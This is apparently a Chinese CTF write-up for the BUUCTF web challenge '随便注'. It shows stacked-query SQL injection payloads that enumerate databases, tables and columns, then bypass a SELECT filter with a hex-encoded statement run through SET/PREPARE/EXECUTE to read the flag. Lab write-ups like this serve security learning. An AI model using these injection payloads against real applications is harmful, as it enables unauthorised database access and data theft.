打开环境

buuctf刷题之旅—web—随便注

 

 

 根据提示应该是sql注入

buuctf刷题之旅—web—随便注

 

 

 查看数据库名,和数据表

1';show databases;#

buuctf刷题之旅—web—随便注

 

 

 1';show tables;#

buuctf刷题之旅—web—随便注

 

 

 查看表内字段(1';desc `1919810931114514`;#)

buuctf刷题之旅—web—随便注

 

 

 发现关键字flag,进行查询

经过注入发现存在过滤

buuctf刷题之旅—web—随便注

 

在注入过程中发现如下代码

buuctf刷题之旅—web—随便注

 

 

 

于是利用set与prepare组合,利用16进制绕过select绕过验证

16进制(select * from 1919810931114514`),

buuctf刷题之旅—web—随便注

 

 

 构造payload如下

1';SeT@a=0x73656C656374202A2066726F6D20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

buuctf刷题之旅—web—随便注

 

 成功拿到flag

 

相关文章:

  • 2022-12-23
  • 2021-06-03
  • 2021-12-02
  • 2022-12-23
  • 2022-12-23
  • 2022-01-04
  • 2021-07-10
  • 2022-01-09
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2021-06-11
  • 2021-05-12
  • 2021-08-11
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案